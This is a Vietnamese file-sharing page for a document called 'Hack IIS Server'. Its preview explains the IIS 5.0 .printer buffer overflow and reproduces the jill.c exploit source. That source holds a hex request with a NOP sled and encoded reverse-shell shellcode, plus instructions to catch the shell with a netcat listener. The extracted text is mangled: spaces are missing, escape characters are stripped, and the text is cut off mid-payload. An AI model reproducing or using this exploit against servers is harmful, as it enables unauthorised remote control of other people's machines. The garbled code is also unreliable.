Hack IIS Server

Số trang: 5 Loại file: doc Dung lượng: 31.50 KB Lượt xem: 9 Lượt tải: 0

10.10.2023

Phí tải xuống: miễn phí

Xem trước 2 trang đầu tiên của tài liệu này:

Thông tin tài liệu:

Đây là bug null printer overflow của IIS 5.0:khi IIS nhận từ port 80 một thông tin như sau:
Nội dung trích xuất từ tài liệu:
Hack IIS ServerHackIISServer:trangnàyđãđượcđọc lầnĐâylàbugnullprinteroverflowcủaIIS5.0:khiIISnhậntừport80mộtthôngtinnhưsau:GET/NULL.printer/HTTP1.0Host:[buffer]vớibufferlàmộtstring>420kýtựthìIISsẽbáooverflowvàhackercóthểchènlệnhcủamìnhvào.Cáchuynhđệcoithửsửdụngsourcesau:(chúýphảichạynetcat(nc.exe)ởmộtconsolekhácđểnhậnconnectiontừserver)/*IIS5remote.printeroverflow.jill.c(dontask).**by:darkspyrit**respecttoeeyeforfindingthisonenicework.*shoutstohalvar,neofightandthebeavuhbitchez.**thisexploitoverwritesanexceptionframetocontroleipandgetto*ourcode..thecodethenlocatesthepointertoourlargerbufferand*execs.**usage:jill**theshellcodespawnsareversecmdshell..soyouneedtosetupa*netcatlisteneronthehostyoucontrol.**Ex:nclpvv**Ihaventsleptinyears.*/#include#include#include#include#include#include#include#include#include#include#include#includeintmain(intargc,char*argv[]){/*thewholerequestrolledintoone,prettyhuh?carez.*/unsignedcharsploit[]=x47x45x54x20x2fx4ex55x4cx4cx2ex70x72x69x6ex74x65x72x20x48x54x54x50x2fx31x2ex30x0dx0ax42x65x61x76x75x68x3ax20x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90x90x8bxc5x33xc9x66xb9xd7x02x50x80x30x95x40xe2xfax2dx95x95x64xe2x14xadxd8xcfx05x95xe1x96xddx7ex60x7dx95x95x95x95xc8x1ex40x14x7fx9ax6bx6ax6ax1ex4dx1exe6xa9x96x66x1exe3xedx96x66x1exebxb5x96x6ex1exdbx81xa6x78xc3xc2xc4x1exaax96x6ex1ex67x2cx9bx95x95x95x66x33xe1x9dxccxcax16x52x91xd0x77x72xccxcaxcbx1ex58x1exd3xb1x96x56x44x74x96x54xa6x5cxf3x1ex9dx1exd3x89x96x56x54x74x97x96x54x1ex95x96x56x1ex67x1ex6bx1ex45x2cx9ex95x95x95x7dxe1x94x95x95xa6x55x39x10x55xe0x6cxc7xc3x6axc2x41xcfx1ex4dx2cx93x95x95x95x7dxcex94x95x95x52xd2xf1x99x95x95x95x52xd2xfdx95x95x95x95x52xd2xf9x94x95x95x95xffx95x18xd2xf1xc5x18xd2x85xc5x18xd2x81xc5x6axc2x55xffx95x18xd2xf1xc5x18xd2x8dxc5x18xd2x89xc5x6axc2x55x52xd2xb5xd1x95x95x95x18xd2xb5xc5x6axc2x51x1exd2x85x1cxd2xc9x1cxd2xf5x1exd2x89x1cxd2xcdx14xdaxd9x94x94x95x95xf3x52xd2xc5x95x95x18xd2xe5xc5x18xd2xb5xc5xa6x55xc5xc5xc5xffx94xc5xc5x7dx95x95x95x95xc8x14x78xd5x6bx6ax6axc0xc5x6axc2x5dx6axe2x85x6axc2x71x6axe2x89x6axc2x71xfdx95x91x95x95xffxd5x6axc2x45x1ex7dxc5xfdx94x94x95x95x6axc2x7dx10x55x9ax10x3fx95x95x95xa6x55xc5xd5xc5xd5xc5x6axc2x79x16x6dx6ax9ax11x02x95x95x95x1ex4dxf3x52x92x97x95xf3x52xd2x97x8exacx52xd2x91x5ex38x4cxb3xffx85x18x92xc5xc6x6axc2x61xffxa7x6axc2x49xa6x5cxc4xc3xc4xc4xc4x6axe2x81x6axc2x59x10x55xe1xf5x05x05x05x05x15xabx95xe1xbax05x05x05x05xffx95xc3xfdx95x91x95x95xc0x6axe2x81x6axc2x4dx10x55xe1xd5x05x05x05x05xffx95x6axa3xc0xc6x6axc2x6dx16x6dx6axe1xbbx05x05x05x05x7ex27xffx95xfdx95x91x95x95xc0xc6x6axc2x69x10x55xe9x8dx05x05x05x05xe1x09xffx95xc3xc5xc0x6axe2x8dx6axc2x41xffxa7x6axc2x49x7ex1fxc6x6axc2x65xffx95x6axc2x75xa6x55x39x10x55xe0x6cxc4xc7xc3xc6x6ax47xcfxccx3ex77x7bx56xd2xf0xe1xc5xe7xfaxf6xd4xf1xf1xe7xf0xe6xe6x95xd9xfaxf4xf1xd9xfcxf7xe7xf4xe7xecxd4x95xd6xe7xf0xf4xe1xf0xc5xfcxe5xf0x95xd2xf0xe1xc6xe1xf4xe7xe1xe0xe5xdcxfbxf3xfaxd4x95xd6xe7xf0xf4xe1xf0xc5xe7xfaxf6xf0xe6xe6xd4x95xc5xf0xf0xfexdbxf4xf8xf0xf1xc5xfcxe5xf0x95xd2xf9xfaxf7xf4xf9xd4xf9xf9xfaxf6x95xc2xe7xfcxe1xf0xd3xfcxf9xf0x95xc7xf0xf4xf1xd3xfcxf9xf0x95xc6xf9xf0xf0xe5x95xd0xedxfcxe1xc5xe7xfaxf6xf0xe6xe6x95xd6xf9xfaxe6xf0xddxf4xfbxf1xf9xf0x95xc2xc6xdaxd6xdexa6xa7x95xc2xc6xd4xc6xe1xf4xe7xe1xe0xe5x95xe6xfaxf6xfexf0xe1x95xf6xf9xfaxe6xf0xe6xfaxf6xfexf0xe1x95xf6xfaxfbxfbxf0xf6xe1x95xe6xf0xfbxf1x95xe7xf0xf6xe3x95xf6xf8xf1xbbxf0xedxf0x95x0dx0ax48x6fx73x74x3ax20x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 ...